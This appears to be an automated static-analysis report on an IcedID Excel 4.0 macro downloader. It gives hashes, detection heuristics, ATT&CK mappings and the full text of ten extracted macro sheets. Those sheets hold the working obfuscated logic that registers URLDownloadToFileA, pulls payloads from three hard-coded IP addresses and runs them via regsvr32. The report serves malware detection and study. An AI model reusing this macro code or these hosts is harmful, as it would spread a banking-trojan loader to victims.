IcedID — Office (OOXML) malware analysis

Static analysis result for SHA-256 d2d7e46997e8fb1b…

MALICIOUS

Office (OOXML)

338.0 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-06-17
MD5: 86329541314a56acdf508f40f4c385fe SHA-1: 8bbca2a8c78bf3e6b69aad822ac70cef1f6959b1 SHA-256: d2d7e46997e8fb1ba496e689765d6562d169e6259ab0ec603843d35b87e477b5
310 Risk Score

Malware Insights

IcedID · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is an Excel file containing multiple Excel 4.0 macro sheets, identified by the OOXML_XLM_MACROSHEET heuristic. These macros utilize dangerous functions like FORMULA and RUN, and specifically call WinAPI functions such as URLDownloadToFileA to download a second-stage payload. The reconstructed command 'regsvr32 -s ..\Post.storg' indicates the execution of a downloaded file. The ClamAV detection name 'Xls.Downloader.IcedID' strongly suggests the IcedID family.

Heuristics 7

  • ClamAV: Xls.Downloader.IcedID-9f1f1d193a2a2a2b-9951463-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.IcedID-9f1f1d193a2a2a2b-9951463-0
  • Excel 4.0 macro sheet (10 sheet(s)) critical 3 related findings OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME
    Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
  • Dangerous XLM formula APIs: FORMULA, RUN, HALT, GOTO critical OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • Binary XLM macro sheet with WinAPI/download strings critical OOXML_XLM_BINARY_WINAPI_STRINGS
    Excel 4.0 macro sheet is stored as BIFF12/XLSB binary data and contains Win32 download or process-execution API strings such as URLDownloadToFileA, ShellExecuteA, or CreateDirectoryA. These strings are high-signal in XLM macro sheets and catch payload-download macros that XML-formula scanners cannot parse.
  • Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 10 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)

Extracted artifacts 10

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_sheet_00.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet1.xml 3364 bytes
SHA-256: 92808d2c5da41a26394309a48c8e5dea8f223f727027d3779324be19512940bd
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{5E92984D-4438-4550-ABFE-0512EE9AFBF8}"><dimension ref="F7:K24"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="17.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="9" width="17.7109375" style="1"/><col min="10" max="10" width="24.42578125" style="1" bestFit="1" customWidth="1"/><col min="11" max="16384" width="17.7109375" style="1"/></cols><sheetData><row r="7" spans="6:11" x14ac:dyDescent="0.25"><c r="J7" s="1" t="b"><f>NOW()=FORMULA(G12&amp;Pervi2!F13&amp;Pervi2!E14,J11)</f><v>0</v></c></row><row r="9" spans="6:11" x14ac:dyDescent="0.25"><c r="J9" s="1"><f>RANDBETWEEN(245,8675436)</f><v>7800682</v></c></row><row r="10" spans="6:11" x14ac:dyDescent="0.25"><c r="I10" s="1" t="s"><v>0</v></c></row><row r="12" spans="6:11" x14ac:dyDescent="0.25"><c r="F12" s="1" t="s"><v>1</v></c><c r="G12" s="1" t="str"><f>F12&amp;F13</f><v>=REGIS</v></c></row><row r="13" spans="6:11" x14ac:dyDescent="0.25"><c r="F13" s="1" t="s"><v>2</v></c><c r="J13" s="1" t="e"><f>Kokiser(J24,K13&amp;I14&amp;J9&amp;I10,sobr!D19,J24,J24)</f><v>#NAME?</v></c><c r="K13" s="1" t="str"><f>K16&amp;K17&amp;K18</f><v>http://</v></c></row><row r="14" spans="6:11" x14ac:dyDescent="0.25"><c r="F14" s="1" t="s"><v>3</v></c><c r="I14" s="1" t="str"><f>"103.155.92.221/"</f><v>103.155.92.221/</v></c></row><row r="15" spans="6:11" x14ac:dyDescent="0.25"><c r="F15" s="1" t="s"><v>4</v></c><c r="I15" s="1" t="str"><f>"89.105.202.71/"</f><v>89.105.202.71/</v></c><c r="J15" s="1" t="e"><f>Kokiser(J24,K13&amp;I15&amp;J9&amp;I10,sobr!E19,J24,J24)</f><v>#NAME?</v></c></row><row r="16" spans="6:11" x14ac:dyDescent="0.25"><c r="F16" s="1" t="s"><v>5</v></c><c r="I16" s="1" t="str"><f>"45.84.1.126/"</f><v>45.84.1.126/</v></c><c r="K16" s="1" t="str"><f>"ht"</f><v>ht</v></c></row><row r="17" spans="6:11" x14ac:dyDescent="0.25"><c r="F17" s="1" t="s"><v>6</v></c><c r="J17" s="1" t="e"><f>Kokiser(J24,K13&amp;I16&amp;J9&amp;I10,sobr!F19,J24,J24)</f><v>#NAME?</v></c><c r="K17" s="1" t="str"><f>"tp"</f><v>tp</v></c></row><row r="18" spans="6:11" x14ac:dyDescent="0.25"><c r="F18" s="1" t="s"><v>7</v></c><c r="K18" s="1" t="str"><f>"://"</f><v>://</v></c></row><row r="21" spans="6:11" x14ac:dyDescent="0.25"><c r="J21" s="1" t="b"><f>RUN(sobr!H4)</f><v>0</v></c></row><row r="24" spans="6:11" x14ac:dyDescent="0.25"><c r="J24" s="1"><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_01.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet2.xml 1756 bytes
SHA-256: 1468ac10d052bf6caa52b715a135583230c630e9863c2cc5597c81988d95f4dc
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{152C4A83-66DD-4326-8571-1E54E357A647}"><dimension ref="E13:F15"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="17.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="17.7109375" style="1"/></cols><sheetData><row r="13" spans="5:6" x14ac:dyDescent="0.25"><c r="F13" s="1" t="str"><f>Pervi!F14</f><v>TER("uRlMon","URL</v></c></row><row r="14" spans="5:6" x14ac:dyDescent="0.25"><c r="E14" s="1" t="str"><f>F14&amp;F15</f><v>DownloadToFileA","JJCCBB","Kokiser",,1,9)</v></c><c r="F14" s="1" t="str"><f>Pervi!F15&amp;Pervi!F16</f><v>DownloadToFile</v></c></row><row r="15" spans="5:6" x14ac:dyDescent="0.25"><c r="F15" s="1" t="str"><f>Pervi!F17&amp;Pervi!F18</f><v>A","JJCCBB","Kokiser",,1,9)</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_02.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet3.xml 2219 bytes
SHA-256: 995b390512315ffed16666534397cb6932a97886fa17d78bb2d92fae83357637
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{7A82D335-2474-445A-8857-B2F2E1287B57}"><dimension ref="D8:K19"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="17.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="17.7109375" style="1"/></cols><sheetData><row r="8" spans="4:11" x14ac:dyDescent="0.25"><c r="D8" s="1" t="s"><v>1</v></c></row><row r="9" spans="4:11" x14ac:dyDescent="0.25"><c r="D9" s="1" t="s"><v>8</v></c></row><row r="10" spans="4:11" x14ac:dyDescent="0.25"><c r="D10" s="1" t="s"><v>9</v></c><c r="H10" s="1" t="b"><f>NOW()=FORMULA(K10&amp;K11,I10)</f><v>0</v></c><c r="K10" s="1" t="str"><f>D9&amp;D10</f><v>EXE</v></c></row><row r="11" spans="4:11" x14ac:dyDescent="0.25"><c r="K11" s="1" t="str"><f>D12</f><v>C("regsvr</v></c></row><row r="12" spans="4:11" x14ac:dyDescent="0.25"><c r="D12" s="1" t="s"><v>10</v></c></row><row r="15" spans="4:11" x14ac:dyDescent="0.25"><c r="D15" s="1" t="s"><v>11</v></c><c r="E15" s="1" t="s"><v>12</v></c><c r="F15" s="1" t="s"><v>13</v></c></row><row r="17" spans="4:8" x14ac:dyDescent="0.25"><c r="H17" s="1" t="b"><f>RUN(sobr1!G3)</f><v>0</v></c></row><row r="19" spans="4:8" x14ac:dyDescent="0.25"><c r="D19" s="1" t="s"><v>14</v></c><c r="E19" s="1" t="s"><v>15</v></c><c r="F19" s="1" t="s"><v>16</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
xlm_sheet_03.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet4.xml 1569 bytes
SHA-256: 9e27c63eb79aa1a21f51d99c1f994e91655cc33cf5d6d20d1646db125d4a508f
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{E2A17D7F-3482-40D4-93FE-A4279C188004}"><dimension ref="G8:G17"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="17.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="6" width="17.7109375" style="1"/><col min="7" max="7" width="19.85546875" style="1" bestFit="1" customWidth="1"/><col min="8" max="16384" width="17.7109375" style="1"/></cols><sheetData><row r="8" spans="7:7" x14ac:dyDescent="0.25"><c r="G8" s="1" t="b"><f>NOW()=FORMULA(sobr!I10&amp;sobr!D15,H8)</f><v>0</v></c></row><row r="17" spans="7:7" x14ac:dyDescent="0.25"><c r="G17" s="1" t="b"><f>RUN(sobr2!H6)</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
xlm_sheet_04.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet5.xml 1634 bytes
SHA-256: 2a837d4ef451240d0866f4ac65bf8a2deb0bac7470e034180f046ef404dfd7fb
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{2DF50EDB-73C2-476B-A52B-D0B8DEEA2B12}"><dimension ref="H12:H19"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="17.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="7" width="17.7109375" style="1"/><col min="8" max="8" width="19.85546875" style="1" bestFit="1" customWidth="1"/><col min="9" max="16384" width="17.7109375" style="1"/></cols><sheetData><row r="12" spans="8:8" x14ac:dyDescent="0.25"><c r="H12" s="1" t="b"><f>NOW()=FORMULA(sobr!I10&amp;sobr!E15,I12)</f><v>0</v></c></row><row r="19" spans="8:8" x14ac:dyDescent="0.25"><c r="H19" s="1" t="b"><f>RUN(sobr3!H7)</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_05.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet6.xml 1572 bytes
SHA-256: 4880b2eb84be4b7a139881993b8b5f5ac9706b749d3c9b9bc743b64f1e88a030
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{A437CB3C-D058-47AA-8D02-E2620B07A475}"><dimension ref="H14:H21"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="17.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="7" width="17.7109375" style="1"/><col min="8" max="8" width="19.85546875" style="1" bestFit="1" customWidth="1"/><col min="9" max="16384" width="17.7109375" style="1"/></cols><sheetData><row r="14" spans="8:8" x14ac:dyDescent="0.25"><c r="H14" s="1" t="b"><f>NOW()=FORMULA(sobr!I10&amp;sobr!F15,I14)</f><v>0</v></c></row><row r="21" spans="8:8" x14ac:dyDescent="0.25"><c r="H21" s="1" t="b"><f>RUN(zap1!H7)</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
xlm_sheet_06.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet7.xml 1571 bytes
SHA-256: b727b5b0e89922534aabbd5127c8e13dff5bfcde7fd64a3dc05b9dee6b4de8e3
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{AEB6F3F2-DC19-4887-A031-91B4EB1869BC}"><dimension ref="H10:H18"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="17.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="7" width="17.7109375" style="1"/><col min="8" max="8" width="20.28515625" style="1" bestFit="1" customWidth="1"/><col min="9" max="16384" width="17.7109375" style="1"/></cols><sheetData><row r="10" spans="8:8" x14ac:dyDescent="0.25"><c r="H10" s="1" t="b"><f>NOW()=FORMULA(sobr!D8&amp;sobr1!H8,H13)</f><v>0</v></c></row><row r="18" spans="8:8" x14ac:dyDescent="0.25"><c r="H18" s="1" t="b"><f>RUN(zap2!I6)</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
xlm_sheet_07.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet8.xml 1565 bytes
SHA-256: 8f2343f6b7171d70b8a27bc29094dbf44d70780c2e20fc54af7f2efd63fb1fe4
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{E1739915-B9EA-432B-AA48-899F85E40FD8}"><dimension ref="I15:I22"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="17.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="8" width="17.7109375" style="1"/><col min="9" max="9" width="20" style="1" bestFit="1" customWidth="1"/><col min="10" max="16384" width="17.7109375" style="1"/></cols><sheetData><row r="15" spans="9:9" x14ac:dyDescent="0.25"><c r="I15" s="1" t="b"><f>NOW()=FORMULA(sobr!D8&amp;sobr2!I12,I18)</f><v>0</v></c></row><row r="22" spans="9:9" x14ac:dyDescent="0.25"><c r="I22" s="1" t="b"><f>RUN(zap3!J11)</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
xlm_sheet_08.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet9.xml 1571 bytes
SHA-256: 5d7c7b03d2a655edbd766182c93921d413fd7b066e3733c964ba6b88fde53057
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{78D9C269-F763-46CC-84F6-334AE824A649}"><dimension ref="J15:J20"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="17.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="9" width="17.7109375" style="1"/><col min="10" max="10" width="20.140625" style="1" bestFit="1" customWidth="1"/><col min="11" max="16384" width="17.7109375" style="1"/></cols><sheetData><row r="15" spans="10:10" x14ac:dyDescent="0.25"><c r="J15" s="1" t="b"><f>NOW()=FORMULA(sobr!D8&amp;sobr3!I14,J18)</f><v>0</v></c></row><row r="20" spans="10:10" x14ac:dyDescent="0.25"><c r="J20" s="1" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
xlm_sheet_09.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 1368 bytes
SHA-256: db9aea15e28350f48db9e6e866d86c12b7aa775eb67c14d3dfbb8f7ef583b729
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{0CBDCEAD-4005-470A-9C61-3C84E3A19D6A}"><dimension ref="A11"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="17.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="17.7109375" style="1"/></cols><sheetData><row r="11" spans="1:1" x14ac:dyDescent="0.25"><c r="A11" s="1" t="e"><f>GOTO(Pervi!J5)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>